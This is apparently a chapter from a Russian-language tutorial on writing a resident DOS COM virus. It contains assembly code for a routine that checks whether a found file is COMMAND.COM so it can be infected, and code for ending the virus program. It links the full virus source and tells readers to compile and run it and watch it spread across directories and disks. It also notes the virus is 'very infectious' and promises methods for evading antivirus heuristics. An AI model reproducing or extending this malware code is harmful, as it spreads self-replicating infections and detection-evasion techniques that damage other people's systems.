Испытание вируса

Комментарии

Текст резидентного COM - вируса

Завершаем программу

Процедура идентификации COMMAND.COM

Приведем текст процедуры, которой пользуется наш вирус. Эта процедура проверяет,является - ли найденный нами файл командным процессором COMMAND.COM и возвращает INSIDE = 1, если был найден именно командный процессор.

Итак:

;------------------------------------------------- search proc ;Процедура push ax ;сравнивает push cx ;строки. .. mov inside,1 lea di,fn lea si,com_com mov cx,7 new_cmp: mov al,byte ptr ds:[si] cmp byte ptr ds:[di],al jne cs:not_equal inc di inc si loop cs:new_cmp jmp cs:to_ret not_equal: mov inside,0 to_ret: pop cx pop ax ret search endp

Работа процедуры достаточно ясна и в комментариях не нуждается.

В принципе, завершить эту программу можно так же, как и предыдущую:

db '1' ;Последний байт ;вируса в файле vir_len equ $-vir ;Длина вируса в ;байтах. .. vir_par equ ( $-vir + 0fh ) / 16 ;И в параграфах prg_end: mov ax,4c00h ;Выход в DOS INT 21H ;только для за- ;пускающей прог- ;раммы. .. db '1' ;И ее последний ;байт. .. prg ends ;Стандартное end start ;" окончание " ;ASM - программы

Единственное отличие заключается в том, что потребовалось ввести константу " vir_par ". Она нужна для расчета необходимой длины блока памяти при инсталляции вируса и в некоторых других вычислениях.

Теперь мы можем привести полный текст резидентной программы - вируса:

Исходный текст comtsr.asm (18K)

В отличие от предыдущего,разработанный в этой главе вирус может отыскивать файлы для заражения на всем жестком диске и даже на дискетах. Это делает его довольно заразным и быстро распространяющимся. Поэтому сложность " конструкции " окупается эффективностью работы вирусного кода.

Вместе с тем, наш вирус имеет определенный недостаток. Ведь его обнаруживает такая распространенная программа, как DOCTOR WEB !В следующей части будет рассказано о способах разработки вирусов, против которых алгоритм эвристического анализа оказывается малоэффективным.

Для исследования работы вируса откомпилируйте его исходный текст для получения COM - файла. После чего запустите этот COM - файл.

"Пройдитесь" по различным каталогам и понаблюдайте, как вирус заражает файлы при смене текущего каталога. Попробуйте перейти на другой диск и проследите за действиями вируса. И последнее, проверьте, заражается ли командный процессор. Все вышеуказанные действия нужно проводить очень аккуратно и не рисковать важными программами, так как вирус, который мы изготовили, весьма заразный, из-за чего у вас могут быть неприятности.

Кроме того, очень советую вам " пройти " зараженную программу отладчиком до точки входа в программный код.

И, наконец,при инсталлированном в память машины вирусном коде запустите программу DOCTOR WEB в режиме поиска резидентных вирусов. Вы убедитесь, что наш вирус обнаруживается как неизвестный.